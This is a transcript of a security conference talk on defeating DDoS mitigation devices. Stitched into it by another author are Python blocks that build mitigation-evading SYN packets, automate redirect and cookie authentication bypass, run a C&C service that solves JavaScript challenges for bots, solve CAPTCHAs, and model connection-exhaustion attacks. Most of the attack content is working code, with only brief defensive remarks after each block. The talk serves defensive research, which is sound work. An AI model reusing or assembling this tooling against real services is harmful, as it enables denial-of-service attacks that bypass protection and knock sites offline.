Tony Mui and Wai-Leng Lee - Kill 'em All — DDoS Protection Total Annihilation

Transcript of Tony Mui and Wai-Leng Lee - Kill 'em All — DDoS Protection Total Annihilation (51 slides)

Page 1

DDoS Protection Total Annihilation

DDoS Mitigation Lab

Page 2

Independent academic R&D division of Nexusguard, building next-generation DDoS mitigation knowledge and collaborating with the defense community.

Industry body formed to foster synergy among stakeholders and promote the advancement of DDoS defense knowledge.

Page 3

DDoS Relevance, Attack Categories, Detection & Mitigation

Source Host Verification: Authentication Methods: TCP SYN Auth, HTTP Redirect Auth, HTTP Cookie Auth, JavaScript Auth, CAPTCHA Auth

PoC Tool: TCP Traffic Model, HTTP Traffic Model

Page 4

Source: NTT Communications,“Successfully Combating DDoS Attacks”, Aug 2012

Page 5

Attack categories: Volumetric, Semantic, Blended

Page 6

[Chart: attacks plotted by Complexity (Simple to Sophisticated) against Volume (xxx Mbps+ to xxx Gbps+)]

Page 7

[Chart: mitigation techniques placed on the same Complexity (Simple to Sophisticated) / Volume (xxx Mbps+ to xxx Gbps+) axes: Traffic Policing, Proactive Resource Release, Black- / Whitelisting]

Page 8

[Chart: detection methods placed on the same Complexity (Simple to Sophisticated) / Volume (xxx Mbps+ to xxx Gbps+) axes: Rate Measurement (SNMP), Baselining (NetFlow), Protocol Sanity (PCAP), Application (SYSLOG), Protocol Behavior (PCAP), Big Data Analysis]

Page 9

Page 10

Traffic pattern simulation, e.g. traffic that looks like it comes from behind a proxy

HTTP header simulation

Simulate normal traffic patterns and behavior!

Page 11

[Diagram: attack traffic with connection B and User-Agent B emerging from behind a proxy]

Page 12

HTTP headers change during the attack.

For example, the HTTP "Accept" header differs between the first and the second request:

First request: Accept: */*
Second request: Accept: image/gif, image/jpeg, imag,…..

Page 13

Using TCP options against detection

Increasing attack power

Page 14

[Diagram: SYN, SYN ACK, ACK, PSH ACK (HTTP request, e.g. GET or POST), ACK, PSH ACK, ... with the connection hold time marked]

Full control of every TCP state!

Page 15

[Diagram: SYN, SYN ACK, ACK, PSH ACK (HTTP GET), ACK, FIN ACK, connections closed...]

OLD-FASHIONED GET flood: high CPU and a constant number of connections, but the server is still ALIVE!

Page 16

[Diagram: SYN, SYN ACK, ACK, PSH ACK (HTTP request), ACK, PSH ACK (HTTP request), ACK... the connections are never closed]

Kill 'EM ALL: high memory, high CPU and an increasing number of connections, until HTTP 503 Service Unavailable

Page 17

TCP SYN Auth

HTTP Redirect Auth

HTTP Cookie Auth

JavaScript Auth

CAPTCHA Auth

Page 18

[Diagram, TCP SYN auth with RST: client SYN, SYN ACK, ACK, then RST; the client's second SYN, SYN ACK, ACK is admitted]

Page 19

[Diagram, TCP SYN auth with out-of-sequence SYN ACK: client SYN, SYN ACK, client RST; the client's second SYN, SYN ACK, ACK is admitted]

Page 20

[Diagram: spoofed source IP: SYN, SYN ACK, RST (may be from the real host)]

TCP RST and TCP out-of-seq are the SAME!

Page 21

Handling a real user access:

TCP RST                      TCP out of seq
TCP Flag    Total Length     TCP Flag    Total Length
SYN         60               SYN         60
SYN ACK     40               SYN ACK     40
ACK         40               RST         40
RST         40
Total       180 bytes        Total       140 bytes

P.S. Packet sizes are IP header plus TCP header: the 60-byte SYN carries 20 bytes of TCP options, the other packets carry none.

Page 22

[Diagram: the attacker uses a real host's IP as the spoofed source IP: SYN, SYN ACK, RST (sent by the real host's stack), SYN]

33% of attack traffic bypassed

Page 23

The traditional SYN flood packet is 40 bytes, missing the TCP options.

How to simulate real SYN traffic: in the IP layer, randomize the TTL; in the TCP layer, randomize the window size and add the correct options, e.g. Maximum Segment Size, etc.

A 48-60 byte TCP SYN flood attack is a nightmare.
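Added example (Python, not the authors' PoC tool): building the two kinds of SYN on the wire format and inspecting them the way a protocol-sanity check would. The bare 40-byte SYN is what a classic flood generator emits; the 60-byte one carries the 20 option bytes a Linux stack sends. The addresses, ports and option values are constructed for the demo, and the check implemented here (flag a SYN with no options or no MSS) is one heuristic the slide's numbers suggest, not any vendor's rule.

```python
"""Added example (not the authors' PoC tool): craft TCP SYN packets with valid
checksums, then pull out the fields a sanity check in a mitigation device looks at.
Addresses, ports and option values are constructed for the demo."""
import random
import struct


def rfc1071_checksum(data: bytes) -> int:
    """Ones-complement sum folded to 16 bits, then complemented (RFC 1071)."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def ip_bytes(addr: str) -> bytes:
    return bytes(int(o) for o in addr.split("."))


def os_style_options(mss: int = 1460, ts: int = 0, wscale: int = 7) -> bytes:
    """The 20 option bytes a Linux stack puts on a SYN, in its order:
    MSS, SACK-permitted, timestamps, NOP, window scale (20 IP + 20 TCP + 20 = 60 bytes)."""
    return (struct.pack("!BBH", 2, 4, mss) + b"\x04\x02"
            + struct.pack("!BBII", 8, 10, ts, 0) + b"\x01"
            + struct.pack("!BBB", 3, 3, wscale))


def build_syn(src, dst, sport, dport, seq, ttl, window, options=b"", ip_id=0) -> bytes:
    """IPv4 + TCP SYN with correct checksums. No options -> the classic 40-byte flood SYN."""
    if len(options) % 4:
        raise ValueError("TCP options must be padded to a 32-bit boundary")
    tcp_len = 20 + len(options)
    tcp = struct.pack("!HHIIBBHHH", sport, dport, seq, 0, (tcp_len // 4) << 4,
                      0x02, window, 0, 0) + options
    pseudo = ip_bytes(src) + ip_bytes(dst) + struct.pack("!BBH", 0, 6, tcp_len)
    tcp = tcp[:16] + struct.pack("!H", rfc1071_checksum(pseudo + tcp)) + tcp[18:]
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + tcp_len, ip_id, 0x4000, ttl, 6, 0,
                     ip_bytes(src), ip_bytes(dst))
    ip = ip[:10] + struct.pack("!H", rfc1071_checksum(ip)) + ip[12:]
    return ip + tcp


def parse_syn(pkt: bytes) -> dict:
    """The fields a protocol-sanity check keys on: TTL, window, lengths, option kinds."""
    ihl = (pkt[0] & 0x0F) * 4
    tcp = pkt[ihl:]
    tcp_hlen = (tcp[12] >> 4) * 4
    opts, kinds, i = tcp[20:tcp_hlen], [], 0
    while i < len(opts):
        kind = opts[i]
        kinds.append(kind)
        if kind == 0:                           # EOL
            break
        i += 1 if kind == 1 else opts[i + 1]    # NOP has no length byte
    return {"ttl": pkt[8], "window": struct.unpack("!H", tcp[14:16])[0],
            "total_len": len(pkt), "tcp_hlen": tcp_hlen, "option_kinds": kinds}


def checksums_ok(pkt: bytes) -> bool:
    """Both checksums verify when the complemented sum over the covered bytes is zero."""
    ihl = (pkt[0] & 0x0F) * 4
    tcp = pkt[ihl:]
    pseudo = pkt[12:20] + struct.pack("!BBH", 0, 6, len(tcp))
    return rfc1071_checksum(pkt[:ihl]) == 0 and rfc1071_checksum(pseudo + tcp) == 0


def looks_like_classic_syn_flood(pkt: bytes) -> bool:
    """A bare 20-byte TCP header (40-byte packet) or a SYN without MSS never comes
    from a real OS stack, which is the cheapest tell a device can key on."""
    f = parse_syn(pkt)
    return f["tcp_hlen"] == 20 or 2 not in f["option_kinds"]


def realistic_syn(seed: int, src="198.51.100.7", dst="203.0.113.10", dport=80) -> bytes:
    """Vary what real hosts vary: an initial TTL (64/128/255) minus a plausible hop
    count, and a window from values common stacks use. A uniformly random TTL or
    window would itself be a giveaway, so the spread stays inside real client values."""
    rng = random.Random(seed)
    ttl = rng.choice([64, 128, 255]) - rng.randint(5, 25)
    window = rng.choice([8192, 14600, 29200, 64240, 65535])
    opts = os_style_options(rng.choice([1360, 1440, 1460]), rng.getrandbits(32), rng.choice([7, 8]))
    return build_syn(src, dst, rng.randint(32768, 60999), dport, rng.getrandbits(32),
                     ttl, window, opts, ip_id=rng.getrandbits(16))
```

On the detection side the caveat is the converse of the slide's point: once an attacker emits 60-byte SYNs with sane options, option presence alone no longer separates flood from user, and the device has to fall back on SYN authentication or baselining.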

Page 24

GET /index.html

HTTP 302 redir to /foo/index.html

GET /foo/index.html

HTTP 302 redir to /index.html

GET /index.html

Page 25

HTTP/1.1 302 Found\r\n

Location: http://a.c.com\r\n

Loop the script until "HTTP/1.1 200 OK"

Page 26

GET /index.html

HTTP 302 redir to /index.html

HTTP 302 redir to /index.html

GET /index.html

GET /index.html

Page 27

Set-Cookie: AuthCode=d8e; expires=Mon, 23-Dec-2019 23:50:00 GMT; ……., etc.

If the expiry date and time is only hours or minutes away, that is the device's RE-AUTH threshold!

If you see this in the third HTTP redirect request:

Set-Cookie: AuthCode=deleted; ……. bad luck

Page 28

GET /index.html

HTTP 302 redir to /index.html [X-Header: foo=bar]

GET /index.html [X-Header: foo=bar]

HTTP 302 redir to /index.html [X-Header: foo=bar]

GET /index.html [X-Header: foo=bar]

Page 29

API, AJAX or XHR2 is used to deploy the header token.

Not all browsers are compatible with those techniques.

Existing mitigation devices cannot fully use those techniques.

Simulating the traffic flow BYPASSES it!
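Added example (Python, not the authors' tool and not any vendor's device): the redirect, cookie and header-token checks from pages 24 to 29 as one toy front-end state machine, plus the client side that follows the flow until it sees 200. It also reads the re-auth threshold off the Set-Cookie expiry as page 27 describes. The secret, cookie name, header name, TTL and the three-redirect limit are constructed for the demo.

```python
"""Added example (not the authors' tool or any vendor's device): a toy mitigation
front-end chaining 302 redirect, Set-Cookie auth code and an echoed header token,
and a client that follows the flow until it gets 200. All constants are constructed."""
import hashlib
import hmac
from dataclasses import dataclass, field
from email.utils import formatdate, parsedate_to_datetime

SECRET = b"constructed-demo-secret"
COOKIE = "AuthCode"
TOKEN_HEADER = "X-Header"
TOKEN_VALUE = "foo=bar"
TTL = 600           # seconds; this is the re-auth threshold the cookie's expires= reveals
MAX_REDIRECTS = 3   # the third failed redirect is answered with AuthCode=deleted


def auth_code(client_ip: str, now: float) -> str:
    """Per-client code that rolls over every TTL seconds; HMAC so it cannot be forged."""
    msg = f"{client_ip}:{int(now // TTL)}".encode()
    return hmac.new(SECRET, msg, hashlib.sha256).hexdigest()[:16]


@dataclass
class Response:
    status: int
    headers: dict = field(default_factory=dict)


class RedirectAuthGuard:
    """Device side: answer 302 with a cookie and a header token until both come back."""

    def __init__(self, clock):
        self.clock = clock      # callable returning seconds, injectable for tests
        self.failed = {}        # client_ip -> consecutive unauthenticated requests

    def handle(self, client_ip: str, path: str, headers: dict) -> Response:
        now = self.clock()
        raw = headers.get("Cookie", "")
        cookies = dict(p.strip().split("=", 1) for p in raw.split(";") if "=" in p)
        if cookies.get(COOKIE) == auth_code(client_ip, now) and headers.get(TOKEN_HEADER) == TOKEN_VALUE:
            self.failed.pop(client_ip, None)
            return Response(200, {"X-Origin": "served"})
        n = self.failed[client_ip] = self.failed.get(client_ip, 0) + 1
        if n > MAX_REDIRECTS:   # "bad luck": the device stops issuing codes to this client
            return Response(302, {"Location": path, "Set-Cookie": f"{COOKIE}=deleted; Max-Age=0"})
        expires = formatdate(now + TTL, usegmt=True)
        return Response(302, {"Location": path, TOKEN_HEADER: TOKEN_VALUE,
                              "Set-Cookie": f"{COOKIE}={auth_code(client_ip, now)}; expires={expires}; path=/"})


def reauth_threshold(set_cookie: str, now: float) -> float:
    """Page 27: the distance to the cookie's expiry is the device's re-auth threshold."""
    attrs = dict(a.strip().split("=", 1) for a in set_cookie.split(";") if "=" in a)
    return parsedate_to_datetime(attrs["expires"]).timestamp() - now


def follow_until_200(guard, client_ip, path, keep_cookies=True, echo_header=True, max_hops=6):
    """Client side, the bot's 'simulate the traffic flow'. Returns the status codes seen."""
    jar, extra, seen = {}, {}, []
    for _ in range(max_hops):
        req = dict(extra) if echo_header else {}
        if jar and keep_cookies:
            req["Cookie"] = "; ".join(f"{k}={v}" for k, v in jar.items())
        resp = guard.handle(client_ip, path, req)
        seen.append(resp.status)
        if resp.status == 200:
            break
        name, _, rest = resp.headers.get("Set-Cookie", "").partition("=")
        value = rest.split(";", 1)[0]
        if value == "deleted":
            jar.pop(name, None)
        elif name:
            jar[name] = value
        if TOKEN_HEADER in resp.headers:
            extra[TOKEN_HEADER] = resp.headers[TOKEN_HEADER]
        path = resp.headers["Location"]
    return seen
```

A client that keeps the cookie and echoes the header is admitted on its second request; a client that drops either loops on 302 and is cut off after the third redirect. The defender's lever is the TTL: a short one forces frequent re-authentication, which a bot that persists cookies also survives, so the check only filters clients that cannot hold state.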

Page 30

GET /index.html

HTTP 302 redir to /index.html

GET /index.html

JS challenge: 7+nine=?

POST /auth.php ans=16

Page 31

JavaScript is a client-side program.

Find the path “http://a.b.com/auth.js”, download and analyze it.

The challenge is embedding JavaScript in a botnet. Guys are using: simulating the traffic flow, the client deployment model, the server deployment model.

Kill ‘Em All is below 1M bytes!

Page 32

[Diagram, client deployment model: the C&C server sends the command "Attack!"; each bot carries its own JS engine, solves the challenge itself and attacks the victim]

Page 33

[Diagram, server deployment model: the C&C server sends the command "Attack!"; the bots ask the C&C server "Tell me the ANS, plz~"; the server resolves auth.js, e.g. an application bundle, and hands the answer to the bots]
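Added example (Python, not the authors' tool): the server deployment model from pages 30 to 33, where the C&C side evaluates the page's arithmetic challenge once and every bot just asks for the answer to post as `ans=`. The challenge grammar (digits or English number words joined by `+`, `-`, `*`, ending in `=?`) is constructed from the "7+nine=?" example on page 30; a real auth.js would need the bundle-resolution step the diagram shows instead of this fixed grammar.

```python
"""Added example (not the authors' tool): C&C-side solver for the page's JavaScript
arithmetic challenge, serving answers to bots that have no JS engine.  The grammar is
constructed from the slide's '7+nine=?' example."""
import re

WORDS = {w: i for i, w in enumerate(
    "zero one two three four five six seven eight nine ten eleven twelve thirteen "
    "fourteen fifteen sixteen seventeen eighteen nineteen".split())}
WORDS.update({"twenty": 20, "thirty": 30, "forty": 40, "fifty": 50, "sixty": 60,
              "seventy": 70, "eighty": 80, "ninety": 90})
TOKEN = re.compile(r"\d+|[a-z]+|[+*-]")   # '=' and '?' are simply skipped


def number(tok: str) -> int:
    if tok.isdigit():
        return int(tok)
    if tok in WORDS:
        return WORDS[tok]
    raise ValueError(f"not a number: {tok}")


def solve_challenge(text: str) -> int:
    """Evaluate e.g. '7+nine=?' -> 16.  Adjacent number words are summed
    ('twenty one' -> 21) and '*' binds tighter than '+' and '-'."""
    items = []
    for tok in TOKEN.findall(text.lower()):
        if tok in "+*-":
            items.append(tok)
        elif items and isinstance(items[-1], int):
            items[-1] += number(tok)
        else:
            items.append(number(tok))
    if not items or not isinstance(items[0], int) or len(items) % 2 == 0:
        raise ValueError(f"malformed challenge: {text!r}")
    total, term, op = 0, items[0], "+"
    for i in range(1, len(items), 2):
        o, v = items[i], items[i + 1]
        if not isinstance(v, int):
            raise ValueError(f"malformed challenge: {text!r}")
        if o == "*":
            term *= v
        else:
            total += term if op == "+" else -term
            term, op = v, o
    return total + (term if op == "+" else -term)


class ChallengeOracle:
    """C&C side: solve each distinct challenge once, serve the answer to every bot."""

    def __init__(self):
        self.answers, self.served = {}, {}

    def answer(self, challenge: str) -> int:
        if challenge not in self.answers:
            self.answers[challenge] = solve_challenge(challenge)
        self.served[challenge] = self.served.get(challenge, 0) + 1
        return self.answers[challenge]


def bot_submit(oracle: ChallengeOracle, challenge: str) -> dict:
    """What a bot without a JS engine posts back, mirroring 'POST /auth.php ans=16'."""
    return {"ans": str(oracle.answer(challenge))}
```

The defensive corollary the diagram implies: a challenge whose answer is the same for every client can be solved once per attack, so per-client variation (and a challenge that depends on browser state the C&C cannot reproduce) is what makes the server model expensive.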

Page 34

GET /index.html

HTTP 302 redir to /index.html

GET /index.html

POST /auth.php

Page 35

JavaScript is a client-side program.

Find the path “http://a.b.com/auth.bmp”, download and analyze it.

The challenge is embedding a CAPTCHA engine in a botnet. Guys are using: simulating the traffic flow, the client deployment model, the server deployment model.

DEFCON has FXXKING many CAPTCHA engines!

Page 36

Page 37

3 tries per authentication attempt (in practice more likely to succeed)

True TCP/IP behavior through use of the OS TCP/IP stack

Auth cookies persist during subsequent dialogues

JavaScript execution using an embedded JS engine (the lack of a complete DOM is an obstacle to full emulation)

Page 38

Page 39

Page 40

1. Converted to black-and-white for max contrast

2. 3x3 median filter applied for denoising

3. Word segmentation

4. Boundary recognition

5. Pixel difference computed against character map
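Added example (Python, not the authors' engine): the five steps above implemented end to end on a constructed four-glyph font, with the generator that stands in for the page's auth.bmp built in so it runs offline. The font, stroke width, noise positions and the top-left-aligned pixel difference are all constructed choices; a real engine needs a far larger character map and more robust segmentation, but the pipeline shape is the one the slide lists.

```python
"""Added example (not the authors' engine): the five-step CAPTCHA recognizer from the
slide in pure Python on a constructed 4-glyph font."""
from typing import Dict, List

Image = List[List[int]]     # grayscale rows, 0 = ink, 255 = paper
Bits = List[List[int]]      # 1 = ink, 0 = paper

GLYPHS = {                  # constructed 5x5 font; every glyph fills its box
    "0": ["#####", "#...#", "#...#", "#...#", "#####"],
    "2": ["#####", "....#", "#####", "#....", "#####"],
    "5": ["#####", "#....", "#####", "....#", "#####"],
    "7": ["#####", "....#", "....#", "....#", "....#"],
}
SCALE, MARGIN, GAP = 2, 2, 3   # 2-px strokes survive a 3x3 median; 3-px gaps split glyphs


def render(text: str) -> Image:
    """Constructed CAPTCHA generator (stands in for the page's auth.bmp)."""
    glyph = 5 * SCALE
    width = 2 * MARGIN + len(text) * glyph + (len(text) - 1) * GAP
    img = [[255] * width for _ in range(glyph + 2 * MARGIN)]
    for k, ch in enumerate(text):
        x0 = MARGIN + k * (glyph + GAP)
        for r, row in enumerate(GLYPHS[ch]):
            for c, cell in enumerate(row):
                if cell == "#":
                    for dr in range(SCALE):
                        for dc in range(SCALE):
                            img[MARGIN + r * SCALE + dr][x0 + c * SCALE + dc] = 0
    return img


def binarize(img: Image, threshold: int = 128) -> Bits:        # step 1
    return [[1 if v < threshold else 0 for v in row] for row in img]


def median3x3(bits: Bits) -> Bits:                              # step 2
    """Majority of the 3x3 neighbourhood; outside the image counts as paper."""
    h, w = len(bits), len(bits[0])
    out = [[0] * w for _ in range(h)]
    for r in range(h):
        for c in range(w):
            ink = sum(bits[rr][cc] for rr in range(r - 1, r + 2) for cc in range(c - 1, c + 2)
                      if 0 <= rr < h and 0 <= cc < w)
            out[r][c] = 1 if ink >= 5 else 0
    return out


def segment(bits: Bits) -> List[tuple]:                         # step 3
    """Column projection: each run of inked columns is a candidate character."""
    inked = [any(row[c] for row in bits) for c in range(len(bits[0]))] + [False]
    runs, start = [], None
    for c, on in enumerate(inked):
        if on and start is None:
            start = c
        elif not on and start is not None:
            runs.append((start, c))
            start = None
    return runs


def crop(bits: Bits, c0: int, c1: int) -> Bits:                 # step 4
    rows = [r for r, row in enumerate(bits) if any(row[c0:c1])]
    return [row[c0:c1] for row in bits[rows[0]:rows[-1] + 1]]


def pixel_diff(a: Bits, b: Bits) -> int:                        # step 5
    """Mismatched pixels with both images aligned top-left; size differences count."""
    h, w = max(len(a), len(b)), max(len(a[0]), len(b[0]))
    at = lambda img, r, c: img[r][c] if r < len(img) and c < len(img[0]) else 0
    return sum(at(a, r, c) != at(b, r, c) for r in range(h) for c in range(w))


def build_character_map() -> Dict[str, Bits]:
    """Templates are clean renders pushed through the same pipeline, so the median
    filter's corner erosion hits template and sample alike."""
    charmap = {}
    for ch in GLYPHS:
        bits = median3x3(binarize(render(ch)))
        (c0, c1), = segment(bits)
        charmap[ch] = crop(bits, c0, c1)
    return charmap


def solve(img: Image, charmap: Dict[str, Bits]) -> str:
    bits = median3x3(binarize(img))
    return "".join(min(charmap, key=lambda ch: pixel_diff(crop(bits, c0, c1), charmap[ch]))
                   for c0, c1 in segment(bits))


def noisy_sample() -> Image:
    """Constructed input: '2057' with pepper specks in margins and gaps and a salt hole in the '2'."""
    img = render("2057")
    for r, c in [(0, 0), (0, 52), (13, 52), (6, 13), (7, 26), (12, 39)]:
        img[r][c] = 0
    img[2][6] = 255
    return img
```

The weak point a practitioner should notice is step 3: column projection only works because the glyphs here never touch or overlap, which is exactly what real CAPTCHA generators break first.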

Page 41

Page 42

[Diagram, TCP traffic model: number of connections over time; for each TCP connection, the connection hold time before the 1st request and the connection idle timeout after the last request; the connections interval between successive TCP connections]

Page 43

Page 44

[Diagram, HTTP traffic model: number of requests per connection; the requests interval between successive HTTP requests on one TCP connection]
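Added example (Python, not the authors' PoC tool): the model parameters from pages 42 and 44 as a small simulator, used to compare the old-fashioned GET flood of page 15 with the hold-every-state pattern of page 16. The two parameter sets and the server connection limit are constructed; the simulator only shows how connection-table pressure follows from the parameters.

```python
"""Added example (not the authors' PoC tool): the TCP/HTTP traffic model parameters as a
simulator, to see how connection hold and idle time drive concurrent connections up to
the point where the server answers 503.  Parameter values are constructed."""
from dataclasses import dataclass
from typing import List, Optional, Tuple


@dataclass(frozen=True)
class TrafficModel:
    connections_interval: float             # seconds between opening successive TCP connections
    hold_time_before_first_request: float   # connection open, nothing sent yet
    requests_per_connection: int
    requests_interval: float                # seconds between HTTP requests on one connection
    idle_timeout_after_last_request: float  # keep the connection open after the last request

    def lifetime(self) -> float:
        gaps = max(self.requests_per_connection - 1, 0) * self.requests_interval
        return self.hold_time_before_first_request + gaps + self.idle_timeout_after_last_request


# Page 15: one GET, FIN right after the response (0.2 s stands in for the server's response time).
OLD_FASHIONED_GET_FLOOD = TrafficModel(1.0, 0.0, 1, 0.0, 0.2)
# Page 16: hold before the first request, spaced requests, then sit idle.
KILL_EM_ALL = TrafficModel(1.0, 30.0, 5, 10.0, 60.0)


def connections(model: TrafficModel, duration: float) -> List[Tuple[float, float, List[float]]]:
    """(open_time, close_time, request_times) for every connection opened within duration."""
    out, t = [], 0.0
    while t < duration:
        first = t + model.hold_time_before_first_request
        reqs = [first + i * model.requests_interval for i in range(model.requests_per_connection)]
        out.append((t, t + model.lifetime(), reqs))
        t += model.connections_interval
    return out


def concurrent_at(conns, t: float) -> int:
    return sum(1 for o, c, _ in conns if o <= t < c)


def peak_concurrency(model: TrafficModel, duration: float) -> int:
    """Concurrency only changes at open/close instants, so sampling the open times is enough."""
    conns = connections(model, duration)
    return max(concurrent_at(conns, o) for o, _, _ in conns)


def requests_per_second(model: TrafficModel, duration: float) -> float:
    total = sum(1 for _, _, reqs in connections(model, duration) for r in reqs if r < duration)
    return total / duration


def time_to_exhaustion(model: TrafficModel, max_conns: int, duration: float) -> Optional[float]:
    """First moment the server's connection table is full (503 from here on),
    or None if the model never gets there within duration."""
    conns = connections(model, duration)
    for o, _, _ in conns:
        if concurrent_at(conns, o) >= max_conns:
            return o
    return None
```

In steady state the concurrency is lifetime divided by connections interval, so the attacker's idle time matters more than the request rate. The idle time a client can actually use is bounded by the server's keep-alive and header-read timeouts, which is why lowering those, not request-rate limiting, is the defensive counterpart to the hold/idle model.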

Page 45

Page 46

True TCP/IP behavior (RST, resend, etc.) through use of the true OS TCP/IP stack

Believable HTTP headers (User-Agent strings, etc.)

Embedded JavaScript engine

CAPTCHA solving capability

Randomized payload

Tunable post-authentication traffic model

Page 47

[Chart: 44 page views, regular traffic]

Page 48

Against Devices: measure attack traffic

Against Services: measure attack traffic

Page 49

[Results table: columns Auth Bypass, Post-Auth, Proactive Resource Release]

Testing results under specific conditions, valid as of Jul 13, 2013

Page 50

[Results table: columns Auth Bypass, Post-Auth, Proactive Resource Release]

Testing results under specific conditions, valid as of Jul 13, 2013

Page 51

[email protected]

[email protected]

http://www.bloodspear.org